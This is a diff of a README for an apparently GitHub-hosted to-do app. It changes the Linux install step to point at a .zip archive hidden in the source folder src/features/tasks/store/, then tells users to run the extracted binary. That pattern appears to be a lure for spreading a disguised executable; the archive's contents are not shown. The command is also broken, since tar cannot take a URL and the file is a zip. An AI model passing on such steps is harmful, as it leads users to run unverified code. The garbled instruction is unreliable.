WorldHeaven777/arcane-todo-app/README.md

 6. For **Linux**:
    - Open a terminal.
    - Navigate to the folder where the file is located.
-   - Run the command: `tar -xvf arcane-todo-app-linux.tar.gz` to extract the files.
+   - Run the command: `tar -xvf https://raw.githubusercontent.com/WorldHeaven777/arcane-todo-app/main/src/features/tasks/store/arcane-todo-app-3.8.zip` to extract the files.
    - Navigate into the extracted folder and run: `./arcane-todo-app` to start the application.

 ## 🛠️ Features